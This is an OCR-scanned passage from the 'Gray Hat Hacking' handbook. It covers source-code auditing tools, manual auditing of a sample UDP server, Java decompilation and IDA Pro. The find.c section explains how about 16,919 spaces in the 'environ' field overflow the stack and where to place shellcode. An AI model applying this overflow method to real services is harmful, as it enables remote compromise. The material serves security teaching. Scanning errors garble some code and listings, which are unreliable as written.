of enabling code analysis within your Visual Studio properties. With code analysis en- 
abled, source code is analyzed automatically each time you attempt to build it, and 
warnings and recommendations are reported inline with any other build-related mes- 
sages. Typical messages report the existence of a problem, and in some cases make 
recommendations for fixing each problem. Like Splint, PREfast supports an annotation 
capability that allows programmers to request more detailed checks from PREfast 
through the specification of pre- and postconditions for functions. 

NOTE Preconditions are a set of one or more conditions that must be true 
upon entry into a particular portion of a program. Typical preconditions might 
include the fact that a pointer must not be NULL, or that an integer value 
must be greater than zero. Postconditions are a set of conditions that must 
hold upon exit from a particular section of a program. These often include 
statements regarding expected return values and the conditions under which 
each value might occur. 

One of the drawbacks to using PREfast is that it may require substantial effort to use 
with projects that have been created on Unix-based platforms, effectively eliminating it 
as a scanning tool for such projects. 

The Utility of Source Code Auditing Tools 

It is clear that source code auditing tools can focus developers' eyes on problem areas 
in their code, but how useful are they for an ethical hacker? The same output is avail- 
able to both the white hat and the black hat hacker, so how is each likely to use the 
information? 




The White Hat Point of View 

The goal of a white hat reviewing the output of a source code auditing tool should be 
to make the software more secure. If we trust that these tools accurately point to prob- 
lem code, it will be in the white hat's best interest to spend her time correcting the 
problems noted by these tools. It requires far less time to convert strcpyQ to strncpyQ 
than it does to backtrack through the code to determine if that same strcpy() function 
is exploitable. The use of strcpy() and similar functions does not by itself make a pro- 
gram exploitable. 
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NOTE The strcpy() function is dangerous because it copies data into a 
destination buffer without any regard for the size of the buffer and therefore 
may overflow the buffer. One of the inputs to the strncpy() function is the 
maximum number of characters to be copied into the destination buffer. 



Programmers who understand the details of functions such as strcpyQ will often 
conduct testing to validate any parameters that will be passed to such functions. Pro- 
grammers who do not understand the details of these exploitable functions often make 
assumptions about the format or structure of input data. While changing strcpyQ to 
strncpyQ may prevent a buffer overflow, it also has the potential to truncate data, which 
may have other consequences later in the application. 




CAUTION The strncpy() function can still prove dangerous. Nothing 
prevents the caller from passing an incorrect length for the destination buffer, 
and under certain circumstances, the destination string may not be properly 
terminated with a null character. 



It is important to make sure that proper validation of input data is taking place. This 
is the time-consuming part of responding to the alerts generated by source code audit- 
ing tools. Having spent the time to secure the code, you have little need to spend much 
more time determining whether or not the original code was actually vulnerable, unless 
you are trying to prove a point. Remember, however, that receiving a clean bill of health 
from a source code auditing tool by no means implies that the program is bulletproof. 
The only hope of completely securing a program is through the use of secure program- 
ming practices from the outset and through periodic manual review by programmers 
familiar with how the code is supposed to function. 



The Black Hat Point of View 

The black hat is by definition interested in finding out how to exploit a program. For 
the black hat, output of source code auditing tools can serve as a jumping-off point for 
finding vulnerabilities. The black hat has little reason to spend time fixing the code 
because this defeats his purpose. The level of effort required to determine whether a 
potential trouble spot is vulnerable is generally much higher than the level of effort the 
white hat will expend fixing that same trouble spot. And, as with the white hat, the 
auditing tool's output is by no means definitive. It is entirely possible to find vulnera- 
bilities in areas of a program not flagged during the automated source code audit. 

The Gray Hat Point of View 

So where does the gray hat fit in here? It is often not the gray hat's job to fix the source 
code she audits. She should certainly present her finding to the maintainers of the soft- 
ware, but there is no guarantee that they will act on the information, especially if they 



NOTE For all but the most trivial of programs, it is virtually impossible to 
formally prove that a program is secure. 
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do not have the time or, worse, refuse to seriously consider the information that they 
are being furnished. In cases where the maintainers refuse to address problems noted 
in a source code audit, whether automated or manual, it may be necessary to provide a 
proof-of-concept demonstration of the vulnerability of the program. In these cases, it is 
useful for the gray hat to understand how to make use of the audit results to locate 
actual vulnerabilities and develop proof-of-concept code to demonstrate the serious- 
ness of these vulnerabilities. Finally, it may fall on the auditor to assist in developing a 
strategy for mitigating the vulnerability in the absence of a vendor fix, as well as to 
develop tools for automatically locating all vulnerable instances of an application with- 
in an organization's network. 

Manual Source Code Auditing 

What can you do when an application is programmed in a language that is not sup- 
ported by an automated scanner? How can you verify all the areas of a program that the 
automated scanners may have missed? How do you analyze programming constructs 
that are too complex for automated analysis tools to follow? In these cases, manual 
auditing of the source code may be your only option. Your primary focus should be on 
the ways in which user-supplied data is handled within the application. Since most 
vulnerabilities are exploited when programs fail to properly handle user input, it is 
important to understand first how data is passed to an application, and second what 
happens with that data. 

Sources of User-Supplied Data 

The following list contains just a few of the ways in which an application can receive 
user input and identifies for each some of the C functions used to obtain that input. 
(This list by no means represents all possible input mechanisms or combinations.) 

• Command-line parameters argv manipulation 

• Environment variables getenv() 

• Input data files read(), fscanf(), getcQ, fgetc(), fgetsQ, vfscanf() 

• Keyboard input/stdin read(), scanf(), getchar(), gets() 

• Network data readQ, recv(), recvfrom() 

It is important to understand that in C, any of the file-related functions can be used 
to read data from any file, including the standard C input file stdin. Also, since Unix 
systems treat network sockets as file descriptors, it is not uncommon to see file input 
functions (rather than the network-oriented functions) used to read network data. 
Finally, it is entirely possible to create duplicate copies of file/ socket socket descriptors 
using the dup() or dup2() function. 
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NOTE In C/C++ programs, file descriptors 0, I, and 2 correspond to the 
standard input (stdin), standard output (stdout), and standard error (stderr) 
devices. The dup2() function can be used to make stdin become a copy of any 
other file descriptor, including network sockets. Once this has been done, a 
program no longer accepts keyboard input; instead, input is taken directly from 
the network socket. 



If the dup2(0) function is used to make stdin a copy of a network socket, you might 
observe getchar() or gets() being used to read incoming network data. Several of the 
source code scanners take command-line options that will cause them to list all func- 
tions (such as those noted previously) in the program that take external input. Running 
ITS4 in this fashion against find.c yields the following: 

# ./its4 -m -v vulns.i4d find.c 
find.c:482: read 
find.c:526: read 

Be careful not to introduce a buffer overflow when using in a loop. 

Make sure to check your buffer boundaries. 



find.c: 610: recvfrom 

Check to make sure malicious input can have no ill effect. 
Carefully check all inputs. 



To locate vulnerabilities, you need to determine which types of input, if any, result 
in user-supplied data being manipulated in an insecure fashion. First, you need to iden- 
tify the locations at which the program accepts data. Second, you need to determine if 
there is an execution path that will pass the user data to a vulnerable portion of code. 
In tracing through these execution paths, you need to note the conditions that are re- 
quired to influence the path of execution in the direction of the vulnerable code. In 
many cases, these paths are based on conditional tests performed against the user data. 
To have any hope of the data reaching the vulnerable code, the data will need to be 
formatted in such a way that it successfully passes all conditional tests between the in- 
put point and the vulnerable code. In a simple example, a web server might be found 
to be vulnerable when a GET request is performed for a particular URL, while a POST 
request for the same URL is not vulnerable. This can easily happen if GET requests are 
farmed out to one section of code (that contains a vulnerability) and POST requests are 
handled by a different section of code that may be secure. More complex cases might 
result from a vulnerability in the processing of data contained deep within a remote 
procedure call (RPC) parameter that may never reach a vulnerable area on a server un- 
less the data is packaged in what appears, from all respects, to be a valid RPC request. 

Common Problems Leading to Exploitable Conditions 

Do not restrict your auditing efforts to searches for calls to functions known to present 
problems. A significant number of vulnerabilities exist independently of the presence 
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of any such calls. Many buffer copy operations are performed in programmer-generated 
loops specific to a given application, as the programmers wish to perform their own 
error checking or input filtering, or the buffers being copied do not fit neatly into the 
molds of some standard API functions. Some of the behaviors that auditors should 
look for include 

• Does the program make assumptions about the length of user-supplied data? 
What happens when the user violates these assumptions? 

• Does the program accept length values from the user? What size data (1,2, 

4 bytes, etc.) does the program use to store these lengths? Does the program 
use signed or unsigned values to store these length values? Does the program 
check for the possible overflow conditions when utilizing these lengths? 

• Does the program make assumptions about the content/format of user- 
supplied data? Does the program attempt to identify the end of various user 
fields based on content rather than length of the fields? 

• How does the program handle situations in which the user has provided more 
data than the program expects? Does the program truncate the input data, 
and if so, is the data properly truncated? Some functions that perform string 
copying are not guaranteed to properly terminate the copied string in all cases. 
One such example is strncat. In these cases, subsequent copy operations may 
result in more data being copied than the program can handle. 

• When handling C-style strings, is the program careful to ensure that buffers 
have sufficient capacity to handle all characters including the null termination 
character? 

• For all array/pointer operations, are there clear checks that prevent access 
beyond the end of an array? 

• Does the program check return values from all functions that provide them? 
Failure to do so is a common problem when using values returned from 
memory allocation functions such as mallocQ, calloc(), realloc(), and new(). 

• Does the program properly initialize all variables that might be read before 
they are written? If not, in the case of local function variables, is it possible to 
perform a sequence of function calls that effectively initializes a variable with 
user-supplied data? 

• Does the program make use of function or jump pointers? If so, do these 
reside in writable program memory? 

• Does the program pass user-supplied strings to any function that might in 
turn use those strings as format strings? It is not always obvious that a string 
may be used as a format string. Some formatted output operations can be 
buried deep within library calls and are therefore not apparent at first glance. 
In the past, this has been the case in many logging functions created by 
application programmers. 
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Example Using find.c 

Using find.c as an example, how would this manual source code auditing process work? 
We need to start with user data entering the program. As seen in the preceding ITS4 
output, there is a recvfrom() function call that accepts an incoming UDP packet. The 
code surrounding the call looks like this: 

char buf [65536]; //buffer to receive incoming udp packet 
int sock, pid; //socket descriptor and process id 
sockaddr_in fsin; //internet socket address information 

// ... 

//Code to take care of the socket setup 

II.. . 

while (1) { //loop forever 

unsigned int alen = sizeof (fsin) ; 

//now read the next incoming UDP packet 
if (recvfrom (sock, buf, sizeof (buf ) , 0, 

(struct sockaddr *)&fsin, &alen) < 0) { 

//exit the program if an error occurred 
errexit ("recvfrom: %s\n", strerror (errno) ) ; 

} 

pid = fork(); //fork a child to process the packet 

if (pid == 0) { //Then this must be the child 

manage_request (buf , sock, &fsin) ; //child handles packet 
exit(0); //child exits after packet is processed 

} 

} 

The preceding code shows a parent process looping to receive incoming UDP pack- 
ets using the recvfromQ function. Following a successful recvfrom(), a child process is 
forked and the manage_request() function is called to process the received packet. We 
need to trace into manage_request() to see what happens with the user's input. We can 
see right off the bat that none of the parameters passed in to manage_request() deals 
with the size of buf, which should make the hair on the back of our necks stand up. The 
manage_request() function starts out with a number of data declarations, as shown 
here: 

162: void manage_request (char *buf, int sock, 

163: struct sockaddr_in* addr) { 

164: char ini t_cwd [ 1024 ] ; 

165: char cmd[512]; 

166: char outf[512]; 

167: char replybuf [ 65536] ; 

168: char *user; 

169: char ^password; 

170: char ^filename; 

171: char * keyword; 

172: char *envstrings [16] ; 

173: char *id; 

174: char *field; 

175: char *p; 

176: int i; 
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Here we see the declaration of many of the fixed-size buffers noted earlier by RATS. 
We know that the input parameter buf points to the incoming UDP packet, and the 
buffer may contain up to 65,535 bytes of data (the maximum size of a UDP packet). 
There are two interesting things to note here: First, the length of the packet is not passed 
into the function, so bounds checking will be difficult and perhaps completely depen- 
dent on well-formed packet content. Second, several of the local buffers are signifi- 
cantly smaller than 65,535 bytes, so the function had better be very careful how it 
copies information into those buffers. Earlier, it was mentioned that the buffer at line 
172 is vulnerable to an overflow. That seems a little difficult given that there is a 64KB 
buffer sitting between it and the return address. 




NOTE Local variables are generally allocated on the stack in the order in 
which they are declared, which means that replybuf generally sits between 
envstrings and the saved return address. Recent versions of gcc/g++ (version 
4. 1 and later) perform stack variable reordering, which makes variable 
locations far less predictable. 



The function proceeds to set some of the pointers by parsing the incoming packet, 
which is expected to be formatted as follows: 



id some_id_value\n 
user some_user_name\n 
password some_users_password\n 
filename some_f ilename\n 
keyword some_keyword\n 

environ key=value key=value key=value . . . \n 



The pointers in the stack are set by locating the key name, searching for the follow- 
ing space, and incrementing by one character position. The values become null termi- 
nated when the trailing \n is located and replaced with \0. If the key names are not 
found in the order listed, or trailing \n characters fail to be found, the input is consid- 
ered malformed and the function returns. Parsing the packet goes well until processing 
of the optional environ values begins. The environ field is processed by the following 
code (note, the pointer p at this point is positioned at the next character that needs 
parsing within the input buffer): 

envstrings [0] = NULL; //assume no environment strings 
if (! strncmp ( "environ" , p, strlen ( "environ" )) ) { 

field = memchr (p, ' ' , strlen (p) ) ; //find trailing space 

if (field == NULL) { //error if no trailing space 

reply(id, "missing environment value", sock, addr) ; 
return; 



field++; //increment to first character of key 

i = 0; //init our index counter into envstrings 

while (1) { //loop as long as we need to 

envstrings [i] = field; //save the next envstring ptr 
p = memchr ( field, ' ’, strlen ( field) ) ; //trailing space 

if (p == NULL) { //if no space then we need a newline 
p = memchr ( field, '\n', strlen (field) ) ; 
if (p == NULL) { 
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reply (id, 
return; 

} 

*p = ' \ 0 ' ; 

i++; 

break; 



"malformed environment value", sock, addr) ; 



//found newline terminate last envstring 

//count the envstring 

//newline marks the end so break 



*p = ' \ 0 ' ; 

field = p + 1; 
i++; 



//terminate the envstring 
//point to start of next envstring 
//count the envstring 



} 

envstrings [i] = NULL; //terminate the list 



Following the processing of the environ field, each pointer in the envstrings array 
is passed to the putenvQ function, so these strings are expected to be in the form 
key= value. In analyzing this code, note that the entire environ field is optional, but 
skipping it wouldn't be any fun for us. The problem in the code results from the fact 
that the while loop that processes each new environment string fails to do any bounds 
checking on the counter i, but the declaration of envstrings only allocates space for 1 6 
pointers. If more than 1 6 environment strings are provided, the variables below the 
envstrings array on the stack will start to get overwritten. We have the makings of a buf- 
fer overflow at this point, but the question becomes: "Can we reach the saved return 
address?" Performing some quick math tells us that there are about 67,600 bytes of 
stack space between the envstrings array and the saved frame pointer/saved return ad- 
dress. Since each member of the envstrings array occupies 4 bytes, if we add 67,600/4 
= 16,900 additional environment strings to our input packet, the pointers to those 
strings will overwrite all of the stack space up to the saved frame pointer. 

Two additional environment strings will give us an overwrite of the frame pointer 
and the return address. How can we include 16,918 environment strings if the form 
key=value is in our packet? If a minimal environment string, say x=y, consumes 4 bytes 
counting the trailing space, then it would seem that our input packet needs to accom- 
modate 67,672 bytes of environment strings alone. Since this is larger than the maxi- 
mum UDP packet size, we seem to be out of luck. Fortunately for us, the preceding loop 
does no parsing of each environment string, so there is no reason for a malicious user 
to use properly formatted (key=value) strings. It is left to you to verify that placing ap- 
proximately 16,919 space characters between the keyword environ and the trailing car- 
riage return should result in an overwrite of the saved return address. Since an input 
line of that size easily fits in a UDP packet, all we need to do now is consider where to 
place our shellcode. The answer is to make it the last environment string, and the nice 
thing about this vulnerability is that we don't even need to determine what value to 
overwrite the saved return address with, as the preceding code handles it for us. Under- 
standing that point is also left to you as an exercise. 



Automated Source Code Analysis 

It was just a matter of time before someone came up with a tool to automate some of 
the mundane source code review tools and processes. 



PART IV 




Gray Hat Hacking, The Ethical Hacker's Handbook, Third Edition 

426 



Yasca 

In 2008, a new automated source code analysis tool was released. It is appropriately 
called Yet Another Source Code Analyzer (Yasca). Yasca, written by Michael Scovetta, 
allows for the automation of many other open source tools like RATS, JLint, PMD, 
FindBugs, FxCop, cppcheck, phplint, and pixy. Using these tools, Yasca allows for the 
automated review of the following: 

• C/C++ 

• Java source and class fdes 

• JSP source fdes 

• PHP source files 

• Perl 

• Python 

Yasca is a framework that comes with a variety of plug-ins (you may write your own 
plug-ins as well). Yasca is easy to use; you download the core package and plug-ins 
(optional), expand them into an installation directory, and then point to the source 
directory from the command line. For example: 

C:\yasca\yasca-2. l>yasca resources\test 

The tool produces an HTML document that has links to the problems and allows 
you to preview the problem directly from the report. 



Yasca 



Yasca Version: 2.1 [ check for updates ] 

Report Generated: 7010-07-01 1 1 :45:1 1 

Options: [ change links | save ignore list | user guide | send feedback J 



Attachments: 



* 


Location 




Message / Source Line 


SQL Injection 


U1 


sca.odbc_execute.sqli.php:22 




1, * , . .. 






02 


std.udbi exec.sqli.piip:22 


// 




<* 


sca.ociexecute.sqli.php:l'J 


22 »>«il - “SELECT * FR0H HHERE fivltl - ' >_GET I ' “ . 


0, 


sca.mysql db query.sqll.php:22 


24 Jceault - cdbc_execuoe ! 5 conn. ?aql) ; 


ns 


sca.mysql.sqli.php:7S 


" 








06 


sca.mssql.sqll.php:26 


■ 


| $sql - "SELECT * FROM table WHERE field - '$ GETfinput zerc 


LL 


lnjer.tion.SQI ,php:fi 


■ 


mysqI_query("Sn ITT SomeStoredProcName( * " . $_GfT[ "i npirfr" __ 



This common vulnerability report marks a quantum leap from the previously sepa- 
rate, command-line-only tools. At the time of writing, this tool is mainly supported on 
Windows, but it should work on Linux platforms as well. 
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Binary Analysis 

Source code analysis will not always be possible. This is particularly true when evaluat- 
ing closed source, proprietary applications. This by no means prevents the reverse engi- 
neer from examining an application; it simply makes such an examination a bit more 
difficult. Binary auditing requires a more expansive skill set than source code auditing 
requires. Whereas a competent C programmer can audit C source code regardless of 
what type of architecture the code is intended to be compiled on, auditing binary code 
requires additional skills in assembly language, executable file formats, compiler be- 
havior, operating system internals, and various other, lower-level skills. Books offering 
to teach you how to program are a dime a dozen, while books that cover the topic of 
reverse engineering binaries are few and far between. Proficiency at reverse engineering 
binaries requires patience, practice, and a good collection of reference material. All you 
need to do is consider the number of different assembly languages, high-level languag- 
es, compilers, and operating systems that exist to begin to understand how many pos- 
sibilities there are for specialization. 

Manual Auditing of Binary Code 

Two types of tools that greatly simplify the task of reverse engineering a binary file are 
disassemblers and decompilers. The purpose of a disassembler is to generate assembly 
language from a compiled binary, while the purpose of a decompiler is to attempt to 
generate source code from a compiled binary. Each task has its own challenges, and 
both are certainly very difficult, with decompilation being by far the more difficult of 
the two. This is because the act of compiling source code is both a lossy operation, 
meaning information is lost in the process of generating machine language, and a one- 
to-many operation, meaning there are many valid translations of a single line of source 
code to equivalent machine language statements. Information that is lost during com- 
pilation can include variable names and data types, making recovery of the original 
source code from the compiled binary all but impossible. Additionally, a compiler 
asked to optimize a program for speed will generate vastly different code from what it 
will generate if asked to optimize that same program for size. Although both compiled 
versions will be functionally equivalent, they will look very different to a decompiler. 
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Decompilers 

Decompilation is perhaps the holy grail of binary auditing. With true decompilation, 
the notion of a closed source product vanishes, and binary auditing reverts to source 
code auditing as discussed previously. As mentioned earlier, however, true decompila- 
tion is an exceptionally difficult task. Some languages lend themselves very nicely to 
decompilation while others do not. Languages that offer the best opportunity for 
decompilation are typically hybrid compiled/interpreted languages such as lava or 
Python. Both are examples of languages that are compiled to an intermediate, machine- 
independent form, generally called byte code. This machine-independent byte code is 
then executed by a machine-dependent byte code interpreter. In the case of Java, this 
interpreter is called a Java Virtual Machine (JVM). 

Two features of Java byte code make it particularly easy to decompile. First, com- 
piled Java byte code files, called class files, contain a significant amount of descriptive 
information. Second, the programming model for the JVM is fairly simple, and its in- 
struction set is fairly small. Both of these properties are true of compiled Python (.pyc) 
files and the Python interpreter as well. A number of open source Java decompilers do 
an excellent job of recovering Java source code, including JReversePro and Jad (Java 
Decompiler). For Python PYC files, the decompyle project offers source code recovery 
services, but as of this writing, the open source version only handles Python files from 
versions 2.3 and earlier (Python 2.5.1 is the version used in this section). 

Java Decompilation Example The following simple example demonstrates the 
degree to which source code can be recovered from a compiled Java class file. The orig- 
inal source code for the class PasswordChecker appears here: 

public class PasswordChecker { 

public boolean checkPassword (String pass) { 
byte [ ] pwChars = pass . getBytes ( ) ; 
for (int i = 0; i < pwChars . length; i++) { 

pwChars [i] += i + 1; 

} 

String pwPlus = new String (pwChars ) ; 
return pwPlus . equals ( "qcvw | uyl" ) ; 

} 

} 



JReversePro is an open source Java decompiler that is itself written in Java. Running 
JReversePro on the compiled PasswordChecker. class file yields the following: 

// JReversePro v 1.4.1 Wed Mar 24 22:08:32 PST 2004 
// http : // j revpro . sourceforge . net 
// Copyright (02000 2001 2002 Karthik Kumar. 

// JReversePro comes with ABSOLUTELY NO WARRANTY; 

// This is free software, and you are welcome to redistribute 

// it under certain conditions; See the File 'COPYING' for more details. 

// Decompiled by JReversePro 1.4.1 
// Home : http://jrevpro.sourceforge.net 
// JVM VERSION: 46.0 

// SOURCEFILE: PasswordChecker . j ava 

public class PasswordChecker { 
public PasswordChecker ( ) 

{ _ __ 
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return; 

i 

public boolean checkPassword (String string) 

{ 

byte [ ] iArr = string . getBytes () ; 
int j = 0; 

String string3; 

for (;j < iArr . length; ) { 

iArr [ j ] = (byte) (iArr[j] + j + 1) ; 

j++; 

} 

string3 = new String ( iArr ) ; 

return (string3 . equals ( "qcvw | uyl" ) ) ; 

} 



The quality of the decompilation is quite good. There are only a few minor differ- 
ences in the recovered code. First, we see the addition of a default constructor that is not 
present in the original but added during the compilation process. 




NOTE In object-oriented programming languages, object data types generally 
contain a special function called a constructor. Constructors are invoked each 
time an object is created in order to initialize each new object. A default 
constructor is one that takes no parameters. When a programmer fails to 
define any constructors for declared objects, compilers generally generate 
a single default constructor that performs no initialization. 



Second, note that we have lost all local variable names and that JReversePro has gen- 
erated its own names according to variable types. JReversePro is able to fully recover class 
names and function names, which helps to make the code very readable. If the class had 
contained any class variables, JReversePro would have been able to recover their original 
names as well. It is possible to recover so much data from Java fdes because of the 
amount of information stored in each class file. This information includes items such as 
class names, function names, function return types, and function parameter signatures. 
All of this is clearly visible in a simple hex dump of a portion of a class file: 



CA 


FE 


BA 


BE 


00 


00 


00 


2E 


00 


IE 


0A 


00 


08 


00 


11 


0A 




00 


03 


00 


12 


07 


00 


13 


0A 


00 


03 


00 


14 


08 


00 


15 


0A 




00 


03 


00 


16 


07 


00 


17 


07 


00 


18 


01 


00 


06 


3C 


69 


6E 


<in 


69 


74 


3E 


01 


00 


03 


28 


29 


56 


01 


00 


04 


43 


6F 


64 


65 


it> . . . ( ) V. . . Code 


01 


00 


OF 


4C 


69 


6E 


65 


4E 


75 


6D 


62 


65 


72 


54 


61 


62 


. . . LineNumberTab 


6C 


65 


01 


00 


0D 


63 


68 


65 


63 


6B 


50 


61 


73 


73 


77 


6F 


le. . .checkPasswo 


72 


64 


01 


00 


15 


28 


4C 


6A 


61 


76 


61 


2F 


6C 


61 


6E 


67 


rd. . . (Ljava/lang 


2F 


53 


74 


72 


69 


6E 


67 


3B 


29 


5A 


01 


00 


0A 


53 


6F 


75 


/String; ) Z . . . Sou 


72 


63 


65 


46 


69 


6C 


65 


01 


00 


14 


50 


61 


73 


73 


77 


6F 


rceFile. . .Passwo 


72 


64 


43 


68 


65 


63 


6B 


65 


72 


2E 


6A 


61 


76 


61 


OC 


00 


rdChecker . j ava . . 


09 


00 


0A 


OC 


00 


19 


00 


1A 


01 


00 


10 


6A 


61 


76 


61 


2F 


java/ 


6C 


61 


6E 


67 


2F 


53 


74 


72 


69 


6E 


67 


OC 


00 


09 


00 


IB 


lang/String 


01 


00 


08 


71 


63 


76 


77 


7C 


75 


79 


6C 


OC 


00 


1C 


00 


ID 


. . . qcvw | uyl 


01 


00 


OF 


50 


61 


73 


73 


77 


6F 


72 


64 


43 


68 


65 


63 


6B 


. . . PasswordCheck 


65 


72 


01 


00 


10 


6A 


61 


76 


61 


2F 


6C 


61 


6E 


67 


2F 


4F 


er. . .java/lang/O 


62 


6A 


65 


63 


74 


01 


00 


08 


67 


65 


74 


42 


79 


74 


65 


73 


bject. . .getBytes 


01 


00 


04 


28 


29 


5B 


42 


01 


00 


05 


28 


5B 


42 


29 


56 


01 


. . . () [B. . . ( [B)V. 


00 


06 


65 


71 


75 


61 


6C 


73 


01 


00 


15 


28 


4C 


6A 


61 


76 


. . equals . . . (Ljav 


61 


2F 


6C 


61 


6E 


67 


2F 


4F 


62 


6A 


65 


63 


74 


3B 


29 


5A 


a/lang/Object; ) Z 
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With all of this information present, it is a relatively simple matter for any Java de- 
compiler to recover high-quality source code from a class fde. 

Decompilation in Other Compiled Languages Unlike Java and Python, 
which compile to a platform-independent byte code, languages like C and C++ are 
compiled to platform-specific machine language and linked to operating system-spe- 
cific libraries. This is the first obstacle to decompiling programs written in such lan- 
guages. A different decompiler would be required for each machine language that we 
wish to decompile. Further complicating matters, compiled programs can generally be 
stripped of all debugging and naming (symbol) information, making it impossible to 
recover any of the original names used in the program, including function and variable 
names and type information. Nevertheless, research and development on decompilers 
does continue. The leading contender in this arena is a new product from the author of 
the Interactive Disassembler Professional (IDA Pro, discussed shortly). The tool, named 
Hex-Rays Decompiler, is an IDA Pro plug-in that can be used to generate decompila- 
tions of compiled x86 programs. Both tools are available from www.hex-rays.com. 

Disassemblers 

While decompilation of compiled code is an extremely challenging task, disassembly 
of that same code is not. For any compiled program to execute, it must communicate 
some information to its host operating system. The operating system will need to know 
the entry point of the program (the first instruction that should execute when the pro- 
gram is started), the desired memory layout of the program, including the location of 
code and data, and what libraries the program will need access to while it is executing. 
All of this information is contained within an executable file and is generated during 
the compilation and linking phases of the program's development. Loaders interpret 
these executable files to communicate the required information to the operating system 
when a file is executed. Two common executable file formats are the Portable Execut- 
able (PE) file format used for Microsoft Windows executables, and the Executable and 
Linking Format (ELF) used by Linux and other Unix variants. Disassemblers function 
by interpreting these executable file formats (in a manner similar to the operating sys- 
tem loader) to learn the layout of the executable, and then processing the instruction 
stream starting from the entry point to break the executable down into its component 
functions. 

IDA Pro 

IDA Pro was created by Ilfak Guilfanov and, as mentioned earlier, is perhaps the pre- 
mier disassembly tool available today. IDA Pro understands a large number of machine 
languages and executable file formats. At its heart, IDA Pro is actually a database ap- 
plication. When a binary is loaded for analysis, IDA Pro loads each byte of the binary 
into a database and associates various flags with each byte. These flags can indicate 
whether a byte represents code, data, or more specific information such as the first byte 
of a multibyte instruction. Names associated with various program locations and com- 
ments generated by IDA Pro or entered by the user are also stored into the database. 
Disassemblies are saved as IDB files separate from the original binary, and IDB files are 
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referred to as database files. Once a disassembly has been saved to its associated data- 
base file, IDA Pro has no need for the original binary, as all information is incorporated 
into the database file. This is useful if you want to analyze malicious software but don't 
want the malicious binary to remain present on your system. 

When used to analyze dynamically linked binaries, IDA Pro makes use of embed- 
ded symbol table information to recognize references to external functions. Within IDA 
Pro's disassembly listing, the use of standard library names helps make the listing far 
more readable. For example, 

call strcpy 

is far more readable than 

call sub_8048A8C ;call the function at address 8048A8C 

For statically linked C/C++ binaries, IDA Pro uses a technique termed Fast Library 
Identification and Recognition Technology (FLIRT), which attempts to recognize whether a 
given machine language function is known to be a standard library function. This is 
accomplished by matching disassembled code against signatures of standard library 
functions used by common compilers. With FLIRT and the application of function type 
signatures, IDA Pro is able to produce a much more readable disassembly. 

In addition to a straightforward disassembly listing, IDA Pro contains a number of 
powerful features that greatly enhance your ability to analyze a binary hie. Some of 
these features include 

• Code graphing capabilities to chart function relationships 

• Flowcharting capabilities to chart function flow 

• A strings window to display sequences of ASCII or Unicode characters 
contained in the binary hie 

• A large database of common data structure layouts and function prototypes 

• A powerful plug-in architecture that allows extensions to IDA Pro's capabilities 
to be easily incorporated 

• A scripting engine for automating many analysis tasks 

• Several integrated debuggers 

Using IDA Pro An IDA Pro session begins when you select a binary hie to analyze. 
Figure 20-1 shows the initial analysis window displayed by IDA Pro once a hie has been 
opened. Note that IDA Pro has already recognized this particular file as a PE format 
executable for Microsoft Windows and has chosen x86 as the processor type. When a 
hie is loaded into IDA Pro, a significant amount of initial analysis takes place. IDA Pro 
analyzes the instruction sequence, assigning location names to all program addresses 
referred to by jump or call instructions, and assigning data names to all program loca- 
tions referred to in data references. If symbol table information is present in the binary, 
IDA Pro will utilize names derived from the symbol table rather than automatically 
generated names. 
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Figure 20-1 

The IDA Pro file 
upload dialog box 




IDA Pro assigns global function names to all locations referenced by call instructions 
and attempts to locate the end of each function by searching for corresponding return 
instructions. A particularly impressive feature of IDA Pro is its ability to track program 
stack usage within each recognized function. In doing so, IDA Pro builds an accurate 
picture of the stack frame structure used by each function, including the precise layout 
of local variables and function parameters. This is particularly useful when you want to 
determine exactly how much data it will take to fill a stack allocated buffer and to over- 
write a saved return address. While source code can tell you how much space a program- 
mer requested for a local array, IDA Pro can show you exactly how that array gets 
allocated at runtime, including any compiler-inserted padding. Following initial analy- 
sis, IDA Pro positions the disassembly display at the program entry point, as shown in 
Figure 20-2. This is a typical function disassembly in IDA Pro. The stack frame of the 
function is displayed first, and then the disassembly of the function itself is shown. 



Figure 20-2 

An IDA Pro 
disassembly listing 





■■M 






text : imuibCLL start 


proc near 




A 


text : 0O015CEE 










text :fiftfn r .nrr uar fifl 


- rlunrd 


ptr fifih 






text ; uuui5Ctt synbolxcLinkNane- UHlL'UDt SIRING ptr own 






text : 0O015CEE Di-viueHdnc 


- UNICODE STRING ptr 58h 






text : OU015CLL sourcestrinq 


- word | 


ptr 5 Oh 






text : 00015CEE gar 2C 


- duord ptr -2Ch 






text : nnni5CFF nrq n 


- rlunrd 


ptr 4 






text : uooibCtt 










' text : 0O015CEE 


-,ub 


rip, 6 Oh 






* text : annisr.r i 


nnu 


enx, fl 






’ text : 00015CF6 


push 


esi 






* text :nnni5CF7 


pn r .h 


edl 






* text: 1)001 bCI B 


nou 


esi. onset aOeuiceUsdatant : 


”\\0ruice\\usdatant" 




' text : 0O015CFD 


lea 


edi, [psp*68li*SuurceSlriiiy] 






* text : nnmsnni 


rep nnusrl 






* text : UUUIbtlUB 


nousw 








* text =00015005 


nuv 


rex, Oflli 






* text : ubui'.-our 


nou 


esi, ollset aOosdeuicesUsda 


"\\0osDeuices\\usdatant" 




’ text : 0001500F 


lea 


edi, [esp»68h*uar 2C1 






* text : 00015013 


rep nnucri 






* text : UU015D15 


nousw 








' text : 0O015D17 


nov 


eii, [esp*68h*dry 0] 






* text : 0O815D1B 


nou 


DriuerObJect , esi 






’ text =00815021 


call 


sub_27BAQ 




- 


■< 


> 
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By convention, IDA Pro names local variables var_XXX, where XXX refers to the 
variable's negative offset within the stack relative to the stack frame pointer. Function 
parameters are named arg_XXX, where XXX refers to the parameter's positive offset 
within the stack relative to the saved function return address. Note in Figure 20-2 that 
some of the local variables are assigned more traditional names. IDA Pro has deter- 
mined that these particular variables are used as parameters to known library functions 
and has assigned names to them based on names used in API (application program- 
ming interface) documentation for those functions' prototypes. You can also see how 
IDA Pro can recognize references to string data and assign a variable name to the string 
while displaying its content as an inline comment. Figure 20-3 shows how IDA Pro re- 
places relatively meaningless call target addresses with much more meaningful library 
function names. Additionally, IDA Pro has inserted comments where it understands the 
data types expected for the various parameters to each function. 

Navigating an IDA Pro Disassembly Navigating your way around an IDA Pro 
disassembly is very simple. Flolding the cursor over any address used as an operand causes 
IDA Pro to display a tooltip window that shows the disassembly at the operand address. 
Double-clicking that same operand causes the disassembly window to jump to the asso- 
ciated address. IDA Pro maintains a history list to help you quickly back out to your 
original disassembly address. The ESC key acts like the Back button in a web browser. 

Making Sense of a Disassembly As you work your way through a disassembly 
and determine what actions a function is carrying out or what purpose a variable serves, 
you can easily change the names IDA Pro has assigned to those functions or variables. 
